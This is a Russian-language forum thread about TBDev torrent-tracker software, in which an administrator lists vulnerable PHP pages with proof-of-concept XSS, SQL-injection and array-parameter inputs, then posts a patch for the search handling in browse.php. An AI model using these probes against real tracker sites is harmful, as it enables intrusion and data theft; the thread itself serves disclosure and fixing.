Уязвимости

Сообщение Nemezida » 09 мар 2021, 21:47

Код: Выделить всё
confirm.php?id[]=
themes/TBDev/stdfoot.php
themes/TBDev/stdhead.php
themes/Gray/stdhead.php
delete.php
captcha.php
thanks.php
votesview.php
takeedit.php
comment.php?action=quote&cid[]=
http://site/offcomment.php?action=<script>alert(/XSS/)</script>
http://site/requests.php?action=reset&requestid=sql'
http://site/requests.php
action=edit&category=1&id=SQL
http://site/offers.php
action=edit&id=SQL
http://site/offers.php
deloffer=SQL
http://site/viewrequests.php?category=><script>alert(/XSS/)</script>
http://site/staffmess.php?returnto=><script>alert(/XSS/)</script>
http://site/stats.php?uporder="><script>alert(/XSS/)</script>
http://site/usersearch.php?r="><script>alert(/XSS/)</script>
recover.php?id[]=
email-gateway.php?id[]=
takeconfirm.php?id[]=
takeinvite.php?id[]=
topten.php?lim[]=
topten.php?type[]=
http://127.0.0.1/treker/log.php?type[]=
http://127.0.0.1/treker/friends.php?action=delete&type[]=&targetid=2
http://127.0.0.1/treker/browse.php?search[]=&incldead=0&cat=0
/testip.php?ip=>
/rss.php?feed=dl&cat=31&passkey[]=
Аватара пользователя
Nemezida
Администратор
Администратор
 
Сообщения: 647
Зарегистрирован: 20 сен 2019, 21:32

Re: Уязвимости

Сообщение Nemezida » 09 мар 2021, 21:59

Заменить в Бровсе:
Код: Выделить всё
if (isset($_GET['search']))
    $searchstr = (string)unesc($_GET["search"]);
$cleansearchstr = htmlspecialchars_uni($searchstr);
if (empty($cleansearchstr))
    unset($cleansearchstr);

на это:
Код: Выделить всё
if(isset($_GET['search']) && !empty($_GET['search']))$searchstr = (string)unesc($_GET["search"]);$cleansearchstr = htmlspecialchars_uni($searchstr);if(empty($cleansearchstr))unset($cleansearchstr);
Аватара пользователя
Nemezida
Администратор
Администратор
 
Сообщения: 647
Зарегистрирован: 20 сен 2019, 21:32


Вернуться в TBDeV

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1